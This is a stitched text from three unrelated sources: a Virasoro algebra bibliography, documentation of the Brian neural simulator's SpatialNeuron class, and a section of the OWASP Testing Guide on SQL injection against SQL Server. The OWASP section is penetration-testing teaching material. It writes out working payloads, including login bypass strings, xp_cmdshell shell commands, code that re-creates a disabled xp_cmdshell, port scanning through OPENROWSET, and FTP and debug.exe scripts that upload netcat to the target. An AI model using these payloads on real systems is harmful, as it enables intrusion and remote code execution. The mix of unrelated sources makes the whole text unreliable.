- Dobrev . V. K. . 1986 . Multiplet classification of the indecomposable highest weight modules over the Neveu-Schwarz and Ramond superalgebras . Lett. Math. Phys. . 11 . 3. 225–234 . 10.1007/bf00400220 . 1986LMaPh..11..225D. 122201087 . & correction: ibid. 13 (1987) 260.
- V. K. Dobrev, "Characters of the irreducible highest weight modules over the Virasoro and super-Virasoro algebras", Suppl. Rendiconti del Circolo Matematico di Palermo, Serie II, Numero 14 (1987) 25-42.
- Antony Wassermann. Lecture notes on Kac-Moody and Virasoro algebras . 1004.1287. math.RT. 2010. Antony Wassermann .
- Antony Wassermann. Direct proofs of the Feigin-Fuchs character formula for unitary representations of the Virasoro algebra. 1012.6003. 2010. math.RT. Antony Wassermann.
Notes and References
- M. A. Virasoro . 1970 . Subsidiary conditions and ghosts in dual-resonance models . . 1 . 10 . 2933–2936. 10.1103/PhysRevD.1.2933. 1970PhRvD...1.2933V .
- 10.1007/BF01218387 . A presentation for the Virasoro and super-Virasoro algebras . Communications in Mathematical Physics. 117 . 4 . 595 . 1988. Fairlie . D. B. . Nuyts . J. . Zachos . C. K. . 1988CMaPh.117..595F . 119811901 .
- 10.1007/BF01221412 . Redundancy of conditions for a Virasoro algebra . Communications in Mathematical Physics . 122 . 1 . 171–173 . 1989 . Uretsky . J. L. . 1989CMaPh.122..171U . 119887710 .
- P. Di Francesco, P. Mathieu, and D. Sénéchal, Conformal Field Theory, 1997, .
- Krichever . I. M. . Novikov . S.P. . 1987 . Algebras of Virasoro type, Riemann surfaces and structures of the theory of solitons . Funkts. Anal. Appl. . 21 . 2. 46–63 . 10.1007/BF01078026 . 55989582 .
- 10.1016/0393-0440(94)00012-S. Super elliptic curves. Journal of Geometry and Physics. 15. 3. 252–280. 1995. Rabin . J. M. . hep-th/9302105 . 1995JGP....15..252R . 10921054. | <urn:uuid:c267e2d3-5adf-46ec-be17-375e23bd260b> | CC-MAIN-2023-14 | https://everything.explained.today/Virasoro_algebra/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950383.8/warc/CC-MAIN-20230402043600-20230402073600-00410.warc.gz | en | 0.785691 | 3,670 | 2.65625 | 3 |
It is possible to create neuron models with a spatially extended morphology, using the SpatialNeuron class. A SpatialNeuron is a single neuron with many compartments. Essentially, it works as a NeuronGroup where elements are compartments instead of neurons. A SpatialNeuron is specified by a morphology (see Creating a neuron morphology) and a set of equations for transmembrane currents (see Creating a spatially extended neuron).
Creating a neuron morphology
Morphologies can be created combining geometrical objects:
soma = Soma(diameter=30*um)
cylinder = Cylinder(diameter=1*um, length=100*um, n=10)
The first statement creates a single iso-potential compartment (i.e. with no axial resistance within the compartment), with its area calculated as the area of a sphere with the given diameter. The second one specifies a cylinder consisting of 10 compartments with identical diameter and the given total length.
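To make the geometry concrete, the areas implied by these two statements can be computed by hand. This is a pure-Python sketch, independent of Brian; it assumes (as the text above describes) that a Soma's area is that of a sphere, and that a Cylinder's area is the lateral surface only, split evenly over its n compartments:

```python
from math import pi

def soma_area(diameter):
    """Membrane area of an iso-potential spherical soma: pi * d**2."""
    return pi * diameter ** 2

def cylinder_compartment_area(diameter, length, n):
    """Lateral membrane area of each of the n identical compartments."""
    return pi * diameter * (length / n)

# Values from the example above, in micrometers
print(soma_area(30))                          # ~2827.4 um^2
print(cylinder_compartment_area(1, 100, 10))  # ~31.4 um^2 per compartment
```

Note that the end caps of the cylinder are not counted here; only the lateral surface contributes to the membrane area in this sketch.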
For more precise control over the geometry, you can specify the length and diameter of each individual compartment, including the diameter at the start of the section (i.e. for n compartments: n length and n + 1 diameter values) in a Section object:

section = Section(diameter=[6, 5, 4, 3, 2, 1]*um, length=[10, 10, 10, 5, 5]*um, n=5)
The individual compartments are modeled as truncated cones, changing the diameter linearly between the given diameters
over the length of the compartment. Note that the
diameter argument specifies the values at the nodes between the
compartments, but accessing the
diameter attribute of a
Morphology object will return the diameter at the center
of the compartment (see the note below).
The following table summarizes the different options to create schematic morphologies (the black compartment before the start of the section represents the parent compartment with diameter 15 μm, not specified in the code below):
Note: for a Section, the diameter argument specifies the diameter between the compartments (and at the beginning/end of the first/last compartment). The corresponding values can therefore later be retrieved from the Morphology via the start_diameter and end_diameter attributes. The diameter attribute of a Morphology does correspond to the diameter at the midpoint of the compartment. For a Cylinder, start_diameter, diameter, and end_diameter are of course all identical.
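The relation between node diameters (as passed to Section) and the midpoint diameters reported by the diameter attribute can be illustrated with simple linear interpolation — a sketch of the truncated-cone convention described above, not Brian's internal code:

```python
def midpoint_diameters(node_diameters):
    """Diameter at the center of each compartment, assuming the diameter
    changes linearly between the nodes (truncated cones)."""
    return [(a + b) / 2 for a, b in zip(node_diameters, node_diameters[1:])]

# Node diameters from the Section example above (in um)
print(midpoint_diameters([6, 5, 4, 3, 2, 1]))  # [5.5, 4.5, 3.5, 2.5, 1.5]
```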
The tree structure of a morphology is created by attaching
Morphology objects together:
morpho = Soma(diameter=30*um)
morpho.axon = Cylinder(length=100*um, diameter=1*um, n=10)
morpho.dendrite = Cylinder(length=50*um, diameter=2*um, n=5)
These statements create a morphology consisting of a cylindrical axon and a dendrite attached to a spherical soma.
Note that the names axon and dendrite are arbitrary and chosen by the user. For example, the same morphology can be created as follows:
morpho = Soma(diameter=30*um)
morpho.output_process = Cylinder(length=100*um, diameter=1*um, n=10)
morpho.input_process = Cylinder(length=50*um, diameter=2*um, n=5)
The syntax is recursive, for example two sections can be added at the end of the dendrite as follows:
morpho.dendrite.branch1 = Cylinder(length=50*um, diameter=1*um, n=3)
morpho.dendrite.branch2 = Cylinder(length=50*um, diameter=1*um, n=3)
Equivalently, one can use an indexing syntax:
morpho['dendrite']['branch1'] = Cylinder(length=50*um, diameter=1*um, n=3)
morpho['dendrite']['branch2'] = Cylinder(length=50*um, diameter=1*um, n=3)
The names given to sections are completely up to the user. However, names that consist of a single digit (1 to 9) or the letters L (for left) and R (for right) allow for a special short syntax: they can be joined together directly, without the need for dots (or dictionary syntax), and therefore allow to quickly navigate through the morphology tree (e.g. morpho.LRLLR is equivalent to morpho.L.R.L.L.R). This short syntax can also be used to create the sections in the first place:
>>> morpho = Soma(diameter=30*um)
>>> morpho.L = Cylinder(length=10*um, diameter=1*um, n=3)
>>> morpho.L1 = Cylinder(length=5*um, diameter=1*um, n=3)
>>> morpho.L2 = Cylinder(length=5*um, diameter=1*um, n=3)
>>> morpho.L3 = Cylinder(length=5*um, diameter=1*um, n=3)
>>> morpho.R = Cylinder(length=10*um, diameter=1*um, n=3)
>>> morpho.RL = Cylinder(length=5*um, diameter=1*um, n=3)
>>> morpho.RR = Cylinder(length=5*um, diameter=1*um, n=3)
The above instructions create a dendritic tree with two main sections, three sections attached to the first section and
two to the second. This can be verified with the topology method:

>>> morpho.topology()
( )  [root]
   `---|  .L
        `---|  .L.1
        `---|  .L.2
        `---|  .L.3
   `---|  .R
        `---|  .R.L
        `---|  .R.R
Note that an expression such as morpho.L will always refer to the entire subtree. However, accessing the attributes (e.g. diameter) will only return the values for the given section.
To avoid ambiguities, do not use names for sections that can be interpreted in the abbreviated way detailed above. For example, do not name a child section L1 (which will be interpreted as the first child of the child section L).
The number of compartments in a section can be accessed with morpho.n (or morpho.L.n, etc.); the number of total sections and compartments in a subtree can be accessed with morpho.total_sections and morpho.total_compartments, respectively.
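As a sanity check on these counts, the totals for the example tree above can be tallied with a little recursion. This is a standalone sketch using a plain nested tuple, not Brian's actual Morphology attributes:

```python
# Each node: (n_compartments, [children]); mirrors the tree built above
# (a soma, then L with children L1/L2/L3 and R with children RL/RR,
# where every cylinder section has 3 compartments).
tree = (1, [(3, [(3, []), (3, []), (3, [])]),
            (3, [(3, []), (3, [])])])

def total_sections(node):
    """Count this section plus all sections in its subtree."""
    n, children = node
    return 1 + sum(total_sections(c) for c in children)

def total_compartments(node):
    """Sum the compartments of this section and its subtree."""
    n, children = node
    return n + sum(total_compartments(c) for c in children)

print(total_sections(tree), total_compartments(tree))  # 8 22
```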
For plotting purposes, it can be useful to add coordinates to a
Morphology that was created using the “schematic”
approach described above. This can be done by calling the
generate_coordinates method on a morphology,
which will return an identical morphology but with additional 2D or 3D coordinates. By default, this method creates a
morphology according to a deterministic algorithm in 2D:
new_morpho = morpho.generate_coordinates()
To get more “realistic” morphologies, this function can also be used to create morphologies in 3D where the orientation of each section differs from the orientation of the parent section by a random amount:
new_morpho = morpho.generate_coordinates(section_randomness=25)
This algorithm will base the orientation of each section on the orientation of the parent section and then randomly
perturb this orientation. More precisely, the algorithm first chooses a random vector orthogonal to the orientation
of the parent section. Then, the section will be rotated around this orthogonal vector by a random angle, drawn from an
exponential distribution with the β parameter (in degrees) given by section_randomness. This β parameter specifies both the mean and the standard deviation of the rotation angle. Note that no maximum rotation angle is enforced; values for section_randomness should therefore be reasonably small (e.g. a section_randomness of 45 would already lead to a probability of ~14% that the section will be rotated by more than 90 degrees, therefore making the section go “backwards”).
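The ~14% figure can be checked directly: for an exponential distribution with mean β, the probability of drawing a value above a threshold t is exp(−t/β). A quick sketch, independent of Brian:

```python
from math import exp

def prob_angle_above(threshold, beta):
    """P(X > threshold) for an exponential distribution with mean beta."""
    return exp(-threshold / beta)

# section_randomness = 45 degrees, threshold = 90 degrees
print(prob_angle_above(90, 45))  # ~0.135, i.e. ~14%
```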
In addition, also the orientation of each compartment within a section can be randomly varied:
new_morpho = morpho.generate_coordinates(section_randomness=25, compartment_randomness=15)
The algorithm is the same as the one presented above, but applied individually to each compartment within a section (still based on the orientation on the parent section, not on the orientation of the previous compartment).
Morphologies can also be created from information about the compartment coordinates in 3D space. Such morphologies can
be loaded from a
.swc file (a standard format for neuronal morphologies; for a large database of morphologies in
this format see http://neuromorpho.org):
morpho = Morphology.from_file('corticalcell.swc')
To manually create a morphology from a list of points in a similar format to SWC files, see Morphology.from_points.
Morphologies that are created in such a way will use standard names for the sections that allow for the short syntax shown in the previous sections: if a section has one or two child sections, then they will be called L and R, otherwise they will be numbered starting at 1.
Morphologies with coordinates can also be created section by section, following the same syntax as for “schematic” morphologies:
soma = Soma(diameter=30*um, x=50*um, y=20*um)
cylinder = Cylinder(n=10, x=[0, 100]*um, diameter=1*um)
section = Section(n=5,
                  x=[0, 10, 20, 30, 40, 50]*um,
                  y=[0, 10, 20, 30, 40, 50]*um,
                  z=[0, 10, 10, 10, 10, 10]*um,
                  diameter=[6, 5, 4, 3, 2, 1]*um)
Note that the x, y and z attributes of Morphology and SpatialNeuron will return the coordinates at the midpoint of each compartment (as for all other attributes that vary over the length of a compartment, e.g. diameter or distance), but during construction the coordinates refer to the start and end points of the section (Cylinder), respectively to the coordinates of the nodes between the compartments (Section).
A few additional remarks:
In the majority of simulations, coordinates are not used in the neuronal equations, therefore the coordinates are purely for visualization purposes and do not affect the simulation results in any way.
Coordinate specification cannot be combined with length specification – lengths are automatically calculated from the coordinates.
The coordinate specification can also be 1- or 2-dimensional (as in the first two examples above), the unspecified coordinate will use 0 μm.
All coordinates are interpreted relative to the parent compartment, i.e. the point (0 μm, 0 μm, 0 μm) refers to the end point of the previous compartment. Most of the time, the first element of the coordinate specification is therefore 0 μm, to continue a section where the previous one ended. However, it can be convenient to use a value different from 0 μm for sections connecting to the Soma, to make them (visually) connect to a point on the sphere surface instead of the center of the sphere.
Creating a spatially extended neuron
A SpatialNeuron is a spatially extended neuron. It is created by specifying the morphology as a
Morphology object, the equations for transmembrane currents, and optionally the specific membrane capacitance
Cm and intracellular resistivity Ri:

gL = 1e-4*siemens/cm**2
EL = -70*mV
eqs = '''
Im = gL * (EL - v) : amp/meter**2
I : amp (point current)
'''
neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1*uF/cm**2, Ri=100*ohm*cm)
neuron.v = EL + 10*mV
Several state variables are created automatically: the SpatialNeuron inherits all the geometrical variables of the compartments (length, diameter, area, volume), as well as the distance variable that gives the distance to the soma. For morphologies that use coordinates, the x, y and z variables are provided as well.
Additionally, a state variable Cm is created. It is initialized with the value given at construction, but it can be modified on a compartment per compartment basis (which is useful to model myelinated axons). The membrane potential is stored in the state variable v.
Note that for all variable values that vary across a compartment (e.g. distance or v), the value that is reported is the value at the midpoint of the compartment.
The key state variable, which must be specified at construction, is
Im. It is the total transmembrane current,
expressed in units of current per area. This is a mandatory line in the definition of the model. The rest of the
string description may include other state variables (differential equations or subexpressions)
or parameters, exactly as in
NeuronGroup. At every timestep, Brian integrates the state variables, calculates the
transmembrane current at every point on the neuronal morphology, and updates
v using the transmembrane current and
the diffusion current, which is calculated based on the morphology and the intracellular resistivity.
Note that the transmembrane current is a surface current density (current per membrane area), not the total current in the compartment.
This choice means that the model equations are independent of the number of compartments chosen for the simulation.
The space and time constants can be obtained for any point of the neuron with the space_constant and time_constant attributes:

l = neuron.space_constant
tau = neuron.time_constant
The calculation is based on the local total conductance (not just the leak conductance); therefore, it can potentially vary during a simulation (e.g. decrease during an action potential). The reported value is only correct for compartments with a cylindrical geometry, though; it does not give reasonable values for compartments with strongly varying diameter.
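For a rough idea of the magnitudes involved, standard cable theory gives λ = sqrt(d / (4 · Ri · g)) and τ = Cm / g for a cylinder of diameter d. The sketch below uses the leak conductance only and SI units throughout; Brian's own calculation uses the local total conductance, as noted above, so this is an order-of-magnitude check, not a reproduction of its internals:

```python
from math import sqrt

# Parameters from the example above, converted to SI units
d = 1e-6    # diameter: 1 um, in m
Ri = 1.0    # intracellular resistivity: 100 ohm*cm = 1 ohm*m
gL = 1.0    # leak conductance: 1e-4 siemens/cm**2 = 1 S/m**2
Cm = 1e-2   # membrane capacitance: 1 uF/cm**2 = 0.01 F/m**2

space_constant = sqrt(d / (4 * Ri * gL))  # in m
time_constant = Cm / gL                   # in s

print(space_constant * 1e3)  # ~0.5 mm
print(time_constant * 1e3)   # ~10 ms
```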
To inject a current
I at a particular point (e.g. through an electrode or a synapse), this current must be divided by
the area of the compartment when inserted in the transmembrane current equation. This is done automatically when the flag point current is specified, as in the example above. This flag can apply only to subexpressions or
parameters with amp units. Internally, the expression of the transmembrane current
Im is simply augmented with
+I/area. A current can then be injected in the first compartment of the neuron (generally the soma) as follows:
neuron.I = 1*nA
State variables of the
SpatialNeuron include all the compartments of that neuron (including subtrees).
Therefore, the statement
neuron.v = EL + 10*mV sets the membrane potential of the entire neuron to -60 mV (assuming EL = -70 mV).
Subtrees can be accessed by attribute (in the same way as in Morphology objects):
neuron.axon.gNa = 10*gL
Note that the state variables correspond to the entire subtree, not just the main section.
That is, if the axon had branches, then the above statement would change
gNa on the main section
and all the sections in the subtree. To access the main section only, use the main attribute:
neuron.axon.main.gNa = 10*gL
A typical use case is when one wants to change parameter values at the soma only. For example, inserting an electrode current at the soma is done as follows:
neuron.main.I = 1*nA
A part of a section can be accessed as follows:
initial_segment = neuron.axon[10*um:50*um]
Finally, similar to the way that you can refer to a subset of neurons of a
NeuronGroup, you can also index the
SpatialNeuron object itself, e.g. to
get a group representing only the first compartment of a cell (typically the
soma), you can use:
soma = neuron[0]
In the same way as for sections, you can also use slices, either with the indices of compartments, or with the distance from the root:
first_compartments = neurons[:3]
first_compartments = neurons[0*um:30*um]
However, note that this is restricted to contiguous indices which most of the time means that all compartments indexed in this way have to be part of the same section. Such indices can be acquired directly from the morphology:
axon = neurons[morpho.axon.indices[:]]
or, more concisely:
axon = neurons[morpho.axon]
There are two methods to have synapses on a SpatialNeuron.
The first one is to insert the synaptic equations directly in the neuron equations:
eqs='''
Im = gL * (EL - v) : amp/meter**2
Is = gs * (Es - v) : amp (point current)
dgs/dt = -gs/taus : siemens
'''
neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1*uF/cm**2, Ri=100*ohm*cm)
Note that, as for electrode stimulation, the synaptic current must be defined as a point current.
Then we use a
Synapses object to connect a spike source to the neuron:
S = Synapses(stimulation, neuron, on_pre='gs += w')
S.connect(i=0, j=50)
S.connect(i=1, j=100)
This creates two synapses, on compartments 50 and 100. Instead of the compartment number, one can specify a spatial position by indexing the morphology:
S.connect(i=0, j=morpho[25*um])
S.connect(i=1, j=morpho.axon[30*um])
In this method for creating synapses,
there is a single value for the synaptic conductance in any compartment.
This means that it will fail if there are several synapses onto the same compartment and the synaptic equations are nonlinear.
The second method, which works in such cases, is to have the synaptic equations in the Synapses object:
eqs='''
Im = gL * (EL - v) : amp/meter**2
Is = gs * (Es - v) : amp (point current)
gs : siemens
'''
neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1*uF/cm**2, Ri=100*ohm*cm)
S = Synapses(stimulation, neuron,
             model='''dg/dt = -g/taus : siemens
                      gs_post = g : siemens (summed)''',
             on_pre='g += w')
Here each synapse (instead of each compartment) has an associated value
g, and all values of
g for each compartment (i.e., all synapses targeting that compartment) are collected
into the compartmental variable gs.
To detect and record spikes, we must specify a threshold condition, essentially in the same
way as for a NeuronGroup:
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='v > 0*mV', refractory='v > -10*mV')
Here spikes are detected when the membrane potential
v reaches 0 mV. Because there is generally
no explicit reset in this type of model (although it is possible to specify one),
v remains above
0 mV for some time. To avoid detecting spikes during this entire time, we specify a refractory period.
In this case no spike is detected as long as
v is greater than -10 mV. Another possibility could be:
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='m > 0.5', refractory='m > 0.4')
m is the state variable for sodium channel activation (assuming this has been defined in the
model). Here a spike is detected when half of the sodium channels are open.
With the syntax above, spikes are detected in all compartments of the neuron. To detect them in a single
compartment, use the threshold_location keyword:
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='m > 0.5', threshold_location=30, refractory='m > 0.4')
In this case, spikes are only detected in compartment number 30. The reset then applies locally to that compartment (if a reset statement is defined). Again, the location of the threshold can be specified as a spatial position:
neuron = SpatialNeuron(morphology=morpho, model=eqs, threshold='m > 0.5', threshold_location=morpho.axon[30*um], refractory='m > 0.4')
In the same way that you can refer to a subset of neurons in a NeuronGroup,
you can also refer to a subset of compartments in a SpatialNeuron.
Testing for SQL Server
This article is part of the OWASP Testing Guide v3. The entire OWASP Testing Guide v3 can be downloaded here.
OWASP is currently working on the OWASP Testing Guide v4: you can browse the Guide here
- 1 Brief Summary
- 2 Short Description of the Issue
- 3 Black Box testing and example
- 3.1 SQL Server Characteristics
- 3.2 Example 1: Testing for SQL Injection in a GET request.
- 3.3 Example 2: Testing for SQL Injection in a GET request
- 3.4 Example 3: Testing in a POST request
- 3.5 Example 4: Yet another (useful) GET example
- 3.6 Example 5: custom xp_cmdshell
- 3.7 Example 6: Referer / User-Agent
- 3.8 Example 7: SQL Server as a port scanner
- 3.9 Example 8: Upload of executables
- 3.10 Obtain information when it is not displayed (Out of band)
- 3.11 Blind SQL injection attacks
- 3.12 Example 9: bruteforce of sysadmin password
- 4 References
This section discusses SQL injection techniques that exploit features specific to Microsoft SQL Server.
Short Description of the Issue
SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL server and execute SQL code under the privileges of the user account used to connect to the database.
As explained in SQL injection, a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:
- Application parameters in query strings (e.g., GET requests)
- Application parameters included as part of the body of a POST request
- Browser-related information (e.g., user-agent, referrer)
- Host-related information (e.g., host name, IP)
- Session-related information (e.g., user ID, cookies)
Microsoft SQL server has a few unique characteristics, so some exploits need to be specially customized for this application.
Black Box testing and example
SQL Server Characteristics
To begin, let's see some SQL Server operators and commands/stored procedures that are useful in a SQL Injection test:
- comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query; this won't be necessary in every case)
- query separator: ; (semicolon)
- Useful stored procedures include:
- [xp_cmdshell] executes any command shell on the server with the same permissions under which the SQL Server service is currently running. By default, only sysadmin is allowed to use it, and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
- xp_regread reads an arbitrary value from the Registry (undocumented extended procedure)
- xp_regwrite writes an arbitrary value into the Registry (undocumented extended procedure)
- [sp_makewebtask] Creates a Web task that produces an HTML document containing the results of an executed query, making it possible to write query output to a browseable file. It requires sysadmin privileges.
- [xp_sendmail] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.
Let's see now some examples of specific SQL Server attacks that use the aforementioned functions. Most of these examples will use the exec function.
Below we show how to execute a shell command that writes the output of the command dir c:\inetpub to a browseable file, assuming that the web server and the DB server reside on the same host. The following syntax uses xp_cmdshell:
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
Alternatively, we can use sp_makewebtask:
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
A successful execution will create a file that can be browsed by the pen tester. Keep in mind that sp_makewebtask is deprecated and, even though it works in all SQL Server versions up to 2005, it might be removed in the future.
In addition, SQL Server built-in functions and environment variables are very handy. The following uses the function db_name() to trigger an error that will return the name of the database:
Notice the use of [convert]:
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )
CONVERT will try to convert the result of db_name (a string) into an integer variable, triggering an error, which, if displayed by the vulnerable application, will contain the name of the DB.
The following example uses the environment variable @@version, combined with a "union select"-style injection, in order to find the version of the SQL Server.
And here's the same attack, but using again the conversion trick:
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of an SQL-injection attack or direct access to the SQL listener.
In the following, we show several examples that exploit SQL injection vulnerabilities through different entry points.
Example 1: Testing for SQL Injection in a GET request.
The most simple (and sometimes most rewarding) case would be that of a login page requesting a user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes):
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application.
Example 2: Testing for SQL Injection in a GET request
In order to learn how many columns the original query returns, the tester can inject ORDER BY clauses with an increasing column index, or UNION SELECT statements with an increasing number of columns, until the server reports an error.
Example 3: Testing in a POST request
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0
A complete post example:
POST https://vulnerable.web.app/forgotpass.asp HTTP/1.1
Host: vulnerable.web.app
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://vulnerable.web.app/forgotpass.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
The error message obtained when a ' (single quote) character is entered at the email field is:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '. /forgotpass.asp, line 15
Example 4: Yet another (useful) GET example
Obtaining the application's source code
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
Example 5: custom xp_cmdshell
All books and papers describing the security best practices for SQL Server recommend disabling xp_cmdshell in SQL Server 2000 (in SQL Server 2005 it is disabled by default). However, if we have sysadmin rights (natively or by bruteforcing the sysadmin password, see below), we can often bypass this limitation.
On SQL Server 2000:
- If xp_cmdshell has been disabled with sp_dropextendedproc, we can simply re-register it by injecting the following code:
sp_addextendedproc 'xp_cmdshell', 'xp_log70.dll'
- If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
This code, written by Antonin Foller (see links at the bottom of the page), creates a new xp_cmdshell using sp_oacreate, sp_oamethod and sp_oadestroy (as long as they haven't been disabled too, of course). Before using it, we need to delete the first xp_cmdshell we created (even if it was not working), otherwise the two declarations will collide.
On SQL Server 2005, xp_cmdshell can be enabled by injecting the following code instead:
master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure
Example 6: Referer / User-Agent
The REFERER header set to:
Referer: https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:
User-Agent: user_agent', 'some_ip'); [SQL CODE]--
Example 7: SQL Server as a port scanner
In SQL Server, one of the most useful (at least for the penetration tester) commands is OPENROWSET, which is used to run a query on another DB Server and retrieve the results. The penetration tester can use this command to scan ports of other machines in the target network, injecting the following query:
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;Address=x.y.w.z,p;timeout=5','select 1')--
This query will attempt a connection to the address x.y.w.z on port p. If the port is closed, the following message will be returned:
SQL Server does not exist or access denied
On the other hand, if the port is open, one of the following errors will be returned:
General network error. Check your network documentation
OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error.
Of course, the error message is not always available. If that is the case, we can use the response time to understand what is going on: with a closed port, the timeout (5 seconds in this example) will be consumed, whereas an open port will return the result right away.
Keep in mind that OPENROWSET is enabled by default in SQL Server 2000 but disabled in SQL Server 2005.
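The tester-side decision logic of such a scan is easy to script. In the sketch below nothing touches the network: `elapsed` and `error_text` stand for whatever the tester measures after submitting the injected OPENROWSET query, and the helper name is made up for illustration:

```python
def classify_port(elapsed, error_text, timeout=5.0):
    """Interpret an injected OPENROWSET probe, following the rules above.

    elapsed:    seconds the injected request took to come back
    error_text: any DB error surfaced by the application ('' if none)
    """
    if "does not exist or access denied" in error_text:
        return "closed"
    if "General network error" in error_text or "reported an error" in error_text:
        return "open"
    # No usable error message: fall back on timing. A closed port burns the
    # whole connection timeout, an open port answers right away.
    return "closed" if elapsed >= timeout else "open"
```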
Example 8: Upload of executables
Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine, all that is needed is to inject the following queries:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
At this point, nc.exe will be uploaded and available.
If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ASCII file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:
exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';--
exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';--
....
exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';--
exec master..xp_cmdshell 'debug.exe < debugscript.txt';--
At this point, our executable is available on the target machine, ready to be executed.
There are tools that automate this process, most notably Bobcat, which runs on Windows, and Sqlninja, which runs on Unix (See the tools at the bottom of this page).
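The binary-to-debug-script conversion those tools perform is mechanical. The sketch below renders bytes in the commonly documented debug.exe script format (name the file, enter hex bytes starting at offset 0100, set CX to the file size, write, quit); it is an illustration, not a re-implementation of makescr.exe or dbgtool.exe, and it inherits debug.exe's limitation to files smaller than 64 KB:

```python
def to_debug_script(data: bytes, filename: str = "nc.exe") -> str:
    """Render bytes as a debug.exe script (pure ASCII)."""
    if len(data) >= 0x10000 - 0x100:
        raise ValueError("debug.exe can only write files below 64 KB")
    lines = [f"n {filename}"]                       # n(ame) the output file
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexbytes = " ".join(f"{b:02x}" for b in chunk)
        lines.append(f"e {0x100 + off:04x} {hexbytes}")  # e(nter) 16 bytes
    lines += ["rcx", f"{len(data):x}",              # set CX to the file size
              "w", "q", ""]                         # w(rite) the file and q(uit)
    return "\n".join(lines)

script = to_debug_script(b"MZ\x90\x00")
```

Each line of the resulting script would then be echoed into debugscript.txt with the xp_cmdshell queries shown above.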
Obtain information when it is not displayed (Out of band)
Not all is lost when the web application does not return any information, such as descriptive error messages (cf. Blind SQL Injection). For example, it might happen that one has access to the source code (e.g., because the web application is based on open source software). Then, the pen tester can exploit all the SQL injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best approach is the following: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested.
Other options for out of band attacks are described in Sample 4 above.
Blind SQL injection attacks
Trial and error
Alternatively, one may get lucky. That is, the attacker may assume that there is a blind or out-of-band SQL injection vulnerability in the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors (1) against this channel, and watch the response. For example, if the web application is looking for a book using the query
select * from books where title=text entered by the user
then the penetration tester might enter the text: 'Bomba' OR 1=1-- and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL injection vulnerability. The penetration tester might later play with the queries in order to assess the criticality of this vulnerability.
